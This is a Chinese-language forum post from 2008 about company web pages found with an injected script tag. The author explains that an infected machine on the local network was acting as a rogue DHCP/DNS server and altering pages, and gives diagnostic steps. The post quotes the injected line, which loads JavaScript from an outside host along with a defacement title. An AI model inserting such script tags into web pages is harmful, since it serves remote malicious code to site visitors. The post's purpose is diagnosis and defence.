TShopping

 找回密碼
 註冊
搜索
查看: 976|回復: 3

[分享] 網站出現惡意連結

  [複製鏈接]
發表於 2008-8-19 08:41:45 | 顯示全部樓層 |閱讀模式
 
Push to Facebook Push to Plurk Push to Twitter 
今天有人發現公司有些主機的網頁在頁面的第一行被惡意植入Java Script
內容如下 複製內容到剪貼板
  1. <script src=http://www.yuan-tai.com/home/include/1/a.js></script><title></title><title>Fuck Th3 W0rld!</title>
複製代碼
但有些Client 並沒有出現此一狀況
在確認公司主機並沒有問題後開始試著找尋其他可能。
最後確認的原因如下
Client 所在的區域網路, 有台電腦中毒了, 而這台電腦有 DHCP Server 與 DNS 等功能.
原本 Client 應該取得正常的 DNS , 卻抓到了偽造的 DNS 資料, 所以:
Client -> 向中毒的電腦連線 -> 中毒的電腦向真正的網站抓資料 -> 加上惡意程式 -> 傳回給 Client .

試著:
1. 指定 Client 使用固定的 IP 與 DNS , 再連 Server (用 IP 連)看看.
2. 當 Client 發生這情況時, 檢查 DHCP 主機, 及取得的 DNS 主機等資料.

例如:
正常:
192.168.1.254 -> 00:00:00:ff:ff:ff
偽造的主機
192.168.1.254 -> 00:aa:bb:cc:dd:ee
而 Client 向偽造的主機連線了.

如果確定有這台惡意主機在, 再去找出主機來處理.

參考資料:酷學園

 

臉書網友討論
發表於 2011-6-8 00:39:08 | 顯示全部樓層
HOHO~~~~感謝分享~~  

版主招募中

您需要登錄後才可以回帖 登錄 | 註冊 |

本版積分規則



Archiver|手機版|小黑屋|免責聲明|TShopping

GMT+8, 2016-12-12 03:49 , Processed in 0.055085 second(s), 18 queries .

本論壇言論純屬發表者個人意見,與 TShopping綜合論壇 立場無關 如有意見侵犯了您的權益 請寫信聯絡我們。

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回復 返回頂部 返回列表